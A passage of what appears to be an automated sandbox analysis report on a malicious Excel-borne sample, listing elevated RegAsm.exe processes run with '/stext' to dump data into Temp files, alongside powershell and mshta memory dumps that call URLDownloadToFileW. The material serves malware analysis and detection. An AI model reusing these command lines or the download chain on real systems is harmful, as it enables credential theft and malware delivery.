                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:20
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:21
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:22
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:23
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:24
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:25
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:26
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Code Analysis

                                              Call Graph

                                              • Entrypoint
                                              • Decryption Function
                                              • Executed
                                              • Not Executed
                                              • Show Help
                                              callgraph 1 Error: Graph is empty

                                              Module: Sheet1

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet1"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: Sheet2

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet2"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: Sheet3

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet3"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: ThisWorkbook

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "ThisWorkbook"

                                              2

                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Reset < >

                                                Executed Functions

                                                Function 03050FA9 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000003.474028806.0000000003050000.00000010.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_3_3050000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                • Instruction ID: 8f977652830568657662fba1f90dc8108fb0e19f6b1c0e3f422b98a6a1d99d35
                                                • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                • Instruction Fuzzy Hash:
                                                Function 03050FB1 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000003.474028806.0000000003050000.00000010.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_3_3050000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                • Instruction ID: 8f977652830568657662fba1f90dc8108fb0e19f6b1c0e3f422b98a6a1d99d35
                                                • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                • Instruction Fuzzy Hash:
                                                Function 03050FB9 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000003.474028806.0000000003050000.00000010.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_3_3050000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                • Instruction ID: 8f977652830568657662fba1f90dc8108fb0e19f6b1c0e3f422b98a6a1d99d35
                                                • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                • Instruction Fuzzy Hash:
                                                Function 03050FC1 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000003.474028806.0000000003050000.00000010.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_3_3050000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                • Instruction ID: 8f977652830568657662fba1f90dc8108fb0e19f6b1c0e3f422b98a6a1d99d35
                                                • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                • Instruction Fuzzy Hash:

                                                Execution Graph

                                                Execution Coverage:4.4%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:3
                                                Total number of Limit Nodes:0
                                                execution_graph 3840 7fe898b7ae1 3841 7fe898b7af1 URLDownloadToFileW 3840->3841 3843 7fe898b7c00 3841->3843

                                                Executed Functions

                                                Function 000007FE898B7018 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 232 7fe898b7018-7fe898b7ba1 236 7fe898b7bab-7fe898b7bb1 232->236 237 7fe898b7ba3-7fe898b7ba8 232->237 238 7fe898b7bbb-7fe898b7bfe URLDownloadToFileW 236->238 239 7fe898b7bb3-7fe898b7bb8 236->239 237->236 240 7fe898b7c06-7fe898b7c23 238->240 241 7fe898b7c00 238->241 239->238 241->240
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496736523.000007FE898B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE898B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe898b0000_powershell.jbxd
                                                Similarity
                                                • API ID: DownloadFile
                                                • String ID:
                                                • API String ID: 1407266417-0
                                                • Opcode ID: e8d85f31ef8d0d04108b71b6ad7fab497301dfbb28909e82bb780397de18ae1c
                                                • Instruction ID: b93c8d49f5bd9e95787c0ca8822e5751f3b626f88b169b8611ee2f78eb9299f3
                                                • Opcode Fuzzy Hash: e8d85f31ef8d0d04108b71b6ad7fab497301dfbb28909e82bb780397de18ae1c
                                                • Instruction Fuzzy Hash: 47319E31918A1C9FDB58EF5CD885BA9B7E1FB69321F00822ED04ED3651DB74A8068B81
                                                Function 000007FE89984165 Relevance: 6.7, Strings: 5, Instructions: 437COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (Fu$0c}$0c}$0c}$8Fu
                                                • API String ID: 0-2339449091
                                                • Opcode ID: e4408c282d90fe65c017c5cdeaf773e6d3a8e6ec53bcf3ea84bd796485be5773
                                                • Instruction ID: 1497ab9942e8992a0977a4a0f5d91e490141bd83a9fdf28716da7125a8eae825
                                                • Opcode Fuzzy Hash: e4408c282d90fe65c017c5cdeaf773e6d3a8e6ec53bcf3ea84bd796485be5773
                                                • Instruction Fuzzy Hash: D5C1142091DAC90FE74AA72C58546BA7FE1EF4A354F1801EFD48ED72B3D618AC52C361
                                                Function 000007FE89980F0D Relevance: 6.6, Strings: 5, Instructions: 352COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8h($8h($8h($8h($xFu
                                                • API String ID: 0-2780450859
                                                • Opcode ID: 90c6a2c71af2d210e2de9b588b8b2602fefa52866a0a900fbb3658af56a84662
                                                • Instruction ID: 3c5d6b5ee94b06e1f4aebcae70715c9dab1ff8ba94d8afca5a6fa42e348f4b93
                                                • Opcode Fuzzy Hash: 90c6a2c71af2d210e2de9b588b8b2602fefa52866a0a900fbb3658af56a84662
                                                • Instruction Fuzzy Hash: A5A1DD20A0D7C90FE35B973858646607FE1EF4B254B2D41EBD48DCB1B3EA189C5AC361
                                                Function 000007FE89988549 Relevance: 3.2, Strings: 2, Instructions: 707COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 93 7fe89988549-7fe899885f9 94 7fe89988add-7fe89988b96 93->94 95 7fe899885ff-7fe89988609 93->95 96 7fe8998860b-7fe89988618 95->96 97 7fe89988622-7fe89988629 95->97 96->97 99 7fe8998861a-7fe89988620 96->99 100 7fe8998862b-7fe8998863e 97->100 101 7fe89988640 97->101 99->97 102 7fe89988642-7fe89988644 100->102 101->102 103 7fe89988a58-7fe89988a62 102->103 104 7fe8998864a-7fe89988656 102->104 108 7fe89988a75-7fe89988a85 103->108 109 7fe89988a64-7fe89988a74 103->109 104->94 107 7fe8998865c-7fe89988666 104->107 110 7fe89988668-7fe89988675 107->110 111 7fe89988682-7fe89988692 107->111 113 7fe89988a87-7fe89988a8b 108->113 114 7fe89988a92-7fe89988adc 108->114 110->111 115 7fe89988677-7fe89988680 110->115 111->103 120 7fe89988698-7fe899886cc 111->120 113->114 115->111 120->103 125 7fe899886d2-7fe899886de 120->125 125->94 126 7fe899886e4-7fe899886ee 125->126 127 7fe89988707-7fe8998870c 126->127 128 7fe899886f0-7fe899886fd 126->128 127->103 130 7fe89988712-7fe89988717 127->130 128->127 129 7fe899886ff-7fe89988705 128->129 129->127 130->103 131 7fe8998871d-7fe89988722 130->131 131->103 133 7fe89988728-7fe89988737 131->133 134 7fe89988747 133->134 135 7fe89988739-7fe89988743 133->135 138 7fe8998874c-7fe89988759 134->138 136 7fe89988763-7fe899887ee 135->136 137 7fe89988745 135->137 145 7fe899887f0-7fe899887fb 136->145 146 7fe89988802-7fe89988824 136->146 137->138 138->136 140 7fe8998875b-7fe89988761 138->140 140->136 145->146 147 7fe89988826-7fe89988830 146->147 148 7fe89988834 146->148 149 7fe89988850-7fe899888de 147->149 150 7fe89988832 147->150 151 7fe89988839-7fe89988846 148->151 158 7fe899888e0-7fe899888eb 149->158 159 7fe899888f2-7fe89988910 149->159 150->151 151->149 152 7fe89988848-7fe8998884e 151->152 152->149 158->159 160 7fe89988920 159->160 161 7fe89988912-7fe8998891c 159->161 164 7fe89988925-7fe89988933 160->164 162 7fe8998893d-7fe899889cd 161->162 163 7fe8998891e 161->163 171 7fe899889cf-7fe899889da 162->171 172 7fe899889e1-7fe89988a3a 162->172 163->164 164->162 165 7fe89988935-7fe8998893b 164->165 165->162 171->172 175 7fe89988a42-7fe89988a57 172->175
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0c}$8=}
                                                • API String ID: 0-431810181
                                                • Opcode ID: bf56f8e5d858fba83af4b2bc718f1ed87a4731f566510a1720b5e7b95c621f20
                                                • Instruction ID: 3d3673bbf61a658f3b79488428caeda4436adc32865adfb18674e9717af95fc3
                                                • Opcode Fuzzy Hash: bf56f8e5d858fba83af4b2bc718f1ed87a4731f566510a1720b5e7b95c621f20
                                                • Instruction Fuzzy Hash: 9922263090CBC94FE78AEB2C94546797BE2FF9A340F1501AED04ED72A3DA24AC56C751
                                                Function 000007FE899856F2 Relevance: 2.9, Strings: 2, Instructions: 374COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 176 7fe899856f2-7fe89985720 177 7fe89985778-7fe8998579a 176->177 178 7fe89985722-7fe89985777 176->178 179 7fe899857a0-7fe899857aa 177->179 180 7fe89985903-7fe899859cc 177->180 178->177 181 7fe899857ac-7fe899857b9 179->181 182 7fe899857c3-7fe899857c8 179->182 181->182 183 7fe899857bb-7fe899857c1 181->183 184 7fe899857ce-7fe899857d1 182->184 185 7fe899858a3-7fe899858ad 182->185 183->182 189 7fe89985816 184->189 190 7fe899857d3-7fe899857e2 184->190 187 7fe899858af-7fe899858bd 185->187 188 7fe899858be-7fe899858ce 185->188 192 7fe899858db-7fe89985900 188->192 193 7fe899858d0-7fe899858d4 188->193 194 7fe89985818-7fe8998581a 189->194 190->180 198 7fe899857e8-7fe899857f2 190->198 192->180 193->192 194->185 196 7fe89985820-7fe89985826 194->196 200 7fe89985828-7fe89985835 196->200 201 7fe89985842-7fe89985884 196->201 203 7fe8998580b-7fe89985814 198->203 204 7fe899857f4-7fe89985801 198->204 200->201 205 7fe89985837-7fe89985840 200->205 213 7fe8998588a-7fe899858a2 201->213 203->194 204->203 206 7fe89985803-7fe89985809 204->206 205->201 206->203
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0c}$V
                                                • API String ID: 0-3170808469
                                                • Opcode ID: 2c0c6345cf54bf8d1dad45d22f2fdc73c763a094f7dd0f66e9e5bb3acee1ea59
                                                • Instruction ID: 49893628579b4657ac8bef12aac44eb2c7563fe7b9f68cdf8c2020ee3c203f6d
                                                • Opcode Fuzzy Hash: 2c0c6345cf54bf8d1dad45d22f2fdc73c763a094f7dd0f66e9e5bb3acee1ea59
                                                • Instruction Fuzzy Hash: A1A1363191DBCC0FE746A7289C156BA3FA4EF8B250F1501EBE48DD71A3D614AD1AC362
                                                Function 000007FE898B7AE1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 215 7fe898b7ae1-7fe898b7aef 216 7fe898b7af2-7fe898b7b05 215->216 217 7fe898b7af1 215->217 218 7fe898b7b07 216->218 219 7fe898b7b08-7fe898b7b19 216->219 217->216 218->219 220 7fe898b7b1b 219->220 221 7fe898b7b1c-7fe898b7ba1 219->221 220->221 225 7fe898b7bab-7fe898b7bb1 221->225 226 7fe898b7ba3-7fe898b7ba8 221->226 227 7fe898b7bbb-7fe898b7bfe URLDownloadToFileW 225->227 228 7fe898b7bb3-7fe898b7bb8 225->228 226->225 229 7fe898b7c06-7fe898b7c23 227->229 230 7fe898b7c00 227->230 228->227 230->229
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496736523.000007FE898B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE898B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe898b0000_powershell.jbxd
                                                Similarity
                                                • API ID: DownloadFile
                                                • String ID:
                                                • API String ID: 1407266417-0
                                                • Opcode ID: 18778eb8516249132d65e376410f08c5a71e8a4e14f4d10781176ac9f482616f
                                                • Instruction ID: f44bbe83aea1951882a072c2417e993dc7607ab0254bd6c9c8f8350c815feed7
                                                • Opcode Fuzzy Hash: 18778eb8516249132d65e376410f08c5a71e8a4e14f4d10781176ac9f482616f
                                                • Instruction Fuzzy Hash: B041167080CB899FDB16DB5898547AABBF4FB56321F04426FD089D3592CB646806CB81

                                                Non-executed Functions

                                                Function 000007FE8998352E Relevance: 2.8, Strings: 2, Instructions: 332COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0c}$h.{
                                                • API String ID: 0-387538172
                                                • Opcode ID: 4df46c14f76ed4fe63979d43981a9cdbf0672c17e7df3764ec09a000b65510c0
                                                • Instruction ID: 724e7128bfab4b796eef85ef7bb4b7a25f384ff35c7e96a201b6a7b831c0e7b5
                                                • Opcode Fuzzy Hash: 4df46c14f76ed4fe63979d43981a9cdbf0672c17e7df3764ec09a000b65510c0
                                                • Instruction Fuzzy Hash: DBA1472090EBC90FD747A77898246A67FF5EF4B214F1901EBD48DCB1B3D618991AC362
                                                Function 000007FE89983A81 Relevance: 9.0, Strings: 7, Instructions: 231COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 416 7fe89983a81-7fe89983a8d 417 7fe89983a8f 416->417 418 7fe89983a90-7fe89983aa1 416->418 417->418 419 7fe89983aa3 418->419 420 7fe89983aa4-7fe89983acc 418->420 419->420 421 7fe89983b06-7fe89983b0e 420->421 422 7fe89983ace-7fe89983ad4 420->422 424 7fe89983b10-7fe89983b2d 421->424 423 7fe89983ad6-7fe89983b05 422->423 422->424 423->421 425 7fe89983b2f-7fe89983b42 424->425 426 7fe89983b44 424->426 428 7fe89983b46-7fe89983b48 425->428 426->428 429 7fe89983c28-7fe89983c32 428->429 430 7fe89983b4e-7fe89983b51 428->430 433 7fe89983c3f-7fe89983c4f 429->433 434 7fe89983c34-7fe89983c3e 429->434 431 7fe89983b68 430->431 432 7fe89983b53-7fe89983b66 430->432 437 7fe89983b6a-7fe89983b6c 431->437 432->437 435 7fe89983c5c-7fe89983c80 433->435 436 7fe89983c51-7fe89983c55 433->436 436->435 437->429 438 7fe89983b72-7fe89983b7f 437->438 440 7fe89983b81-7fe89983b8c 438->440 441 7fe89983b93-7fe89983ba3 438->441 440->441 442 7fe89983bb7-7fe89983be5 441->442 443 7fe89983ba5-7fe89983bb0 441->443 445 7fe89983be7-7fe89983bfe 442->445 446 7fe89983c00-7fe89983c10 442->446 443->442 449 7fe89983c17-7fe89983c27 445->449 446->449
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XhB$h.{$h.{$h.{$h.{$h.{$h.{
                                                • API String ID: 0-2272823907
                                                • Opcode ID: 8e3f776959b9733b05d5ba1a6f708fc0c0146bb3435a1775b411c39dfdb150d3
                                                • Instruction ID: 5038a6da4350781ad87aaeb07305aff6ba874988b10e833143c80923d67f8fa8
                                                • Opcode Fuzzy Hash: 8e3f776959b9733b05d5ba1a6f708fc0c0146bb3435a1775b411c39dfdb150d3
                                                • Instruction Fuzzy Hash: 7061F321A0D6CA4FE717932C58242B67FB2EF8B354F2941EBD08DEB1B3D6186819C351
                                                Function 000007FE899804C2 Relevance: 8.0, Strings: 6, Instructions: 498COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 450 7fe899804c2-7fe89980508 451 7fe8998050a-7fe89980511 450->451 452 7fe89980512-7fe89980522 450->452 451->452 453 7fe8998056c-7fe89980571 452->453 454 7fe89980524-7fe89980551 452->454 457 7fe8998057b-7fe89980580 453->457 458 7fe89980573-7fe89980579 453->458 455 7fe89980557-7fe89980561 454->455 456 7fe89980793-7fe899807ab 454->456 455->457 461 7fe89980563-7fe8998056b 455->461 472 7fe899807ad-7fe899807f3 456->472 473 7fe899807f5-7fe89980847 456->473 459 7fe89980586-7fe89980589 457->459 460 7fe89980722-7fe8998072c 457->460 458->457 463 7fe8998058b-7fe8998059e 459->463 464 7fe899805a0 459->464 466 7fe8998072e 460->466 467 7fe8998073f-7fe8998074f 460->467 461->453 471 7fe899805a2-7fe899805a4 463->471 464->471 468 7fe8998072f-7fe8998073e 466->468 469 7fe8998075c 467->469 470 7fe89980751-7fe89980755 467->470 474 7fe8998075d-7fe89980792 469->474 470->469 471->460 475 7fe899805aa-7fe899805de 471->475 472->473 490 7fe89980849-7fe89980851 473->490 491 7fe89980852-7fe899808e7 473->491 485 7fe899805e0-7fe899805f3 475->485 486 7fe899805f5 475->486 487 7fe899805f7-7fe899805f9 485->487 486->487 487->460 489 7fe899805ff-7fe89980602 487->489 489->460 492 7fe89980608-7fe8998060b 489->492 490->491 493 7fe8998060d-7fe89980620 492->493 494 7fe89980622 492->494 495 7fe89980624-7fe89980626 493->495 494->495 495->460 496 7fe8998062c-7fe8998062f 495->496 496->460 497 7fe89980635-7fe8998066f 496->497 500 7fe89980688-7fe89980695 497->500 501 7fe89980671-7fe8998067e 497->501 503 7fe89980697-7fe899806a2 500->503 504 7fe899806a9-7fe899806af 500->504 501->500 502 7fe89980680-7fe89980686 501->502 502->500 503->504 505 7fe89980720-7fe89980721 504->505 506 7fe899806b1-7fe899806b3 504->506 506->468 507 7fe899806b5 506->507 509 7fe899806b7-7fe899806ce 507->509 510 7fe899806fc 507->510 511 7fe899806ff-7fe89980707 509->511 512 7fe899806d0-7fe899806f8 509->512 510->474 510->511 513 7fe89980709 511->513 514 7fe8998070b-7fe89980710 511->514 512->510 515 7fe89980711-7fe8998071f 513->515 514->515 515->505
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (U/$(U/$(U/$0T}$0c}$8=}
                                                • API String ID: 0-3578353684
                                                • Opcode ID: dd17834e94354e9b3174dbad10622baadbe633636f5adfaed6ea4443f572a6ba
                                                • Instruction ID: 00e8bd6f259f981fd4506b54c7b626880da89c83a9d9c976bc3154f7b74fd451
                                                • Opcode Fuzzy Hash: dd17834e94354e9b3174dbad10622baadbe633636f5adfaed6ea4443f572a6ba
                                                • Instruction Fuzzy Hash: 5DE1D02190D7CA0FE71A973858252B97FE1EF47254F1901EFD48AEB1B3D6186816C3A2
                                                Function 000007FE899800DD Relevance: 8.0, Strings: 6, Instructions: 470COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 517 7fe899800dd-7fe89980152 519 7fe8998019c-7fe899801a1 517->519 520 7fe89980154-7fe89980181 517->520 523 7fe899801ab-7fe899801b0 519->523 524 7fe899801a3-7fe899801a9 519->524 521 7fe89980187-7fe89980191 520->521 522 7fe899803c3-7fe899803db 520->522 521->523 525 7fe89980193-7fe8998019b 521->525 535 7fe899803dd-7fe89980423 522->535 536 7fe89980425-7fe89980477 522->536 526 7fe899801b6-7fe899801b9 523->526 527 7fe89980352-7fe8998035c 523->527 524->523 525->519 528 7fe899801bb-7fe899801ce 526->528 529 7fe899801d0 526->529 531 7fe8998035e 527->531 532 7fe8998036f-7fe8998037f 527->532 534 7fe899801d2-7fe899801d4 528->534 529->534 537 7fe8998035f-7fe8998036e 531->537 538 7fe8998038c-7fe899803c2 532->538 539 7fe89980381-7fe89980385 532->539 534->527 540 7fe899801da-7fe8998020e 534->540 535->536 555 7fe89980479-7fe89980481 536->555 556 7fe89980482-7fe899804c1 536->556 539->538 550 7fe89980210-7fe89980223 540->550 551 7fe89980225 540->551 552 7fe89980227-7fe89980229 550->552 551->552 552->527 554 7fe8998022f-7fe89980232 552->554 554->527 557 7fe89980238-7fe8998023b 554->557 555->556 558 7fe8998023d-7fe89980250 557->558 559 7fe89980252 557->559 560 7fe89980254-7fe89980256 558->560 559->560 560->527 561 7fe8998025c-7fe8998025f 560->561 561->527 562 7fe89980265-7fe8998029f 561->562 565 7fe899802b8-7fe899802c5 562->565 566 7fe899802a1-7fe899802ae 562->566 568 7fe899802c7-7fe899802d2 565->568 569 7fe899802d9-7fe899802df 565->569 566->565 567 7fe899802b0-7fe899802b6 566->567 567->565 568->569 570 7fe89980350-7fe89980351 569->570 571 7fe899802e1-7fe899802e3 569->571 571->537 573 7fe899802e5 571->573 574 7fe899802e7-7fe899802fe 573->574 575 7fe8998032c 573->575 576 7fe8998032f-7fe89980337 574->576 577 7fe89980300-7fe89980328 574->577 575->576 578 7fe89980339 576->578 579 7fe8998033b-7fe89980340 576->579 577->575 580 